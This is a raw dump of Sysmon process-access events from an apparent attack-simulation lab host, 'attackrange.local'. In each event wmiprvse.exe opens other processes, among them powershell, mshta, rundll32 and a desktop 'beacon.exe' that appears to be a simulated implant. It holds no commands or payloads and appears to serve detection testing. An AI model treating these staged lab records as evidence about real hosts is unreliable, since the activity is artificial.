16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246661Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246660Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246659Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246658Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246657Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246656Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246655Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246654Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246653Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246652Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246651Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246650Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246649Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.288{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 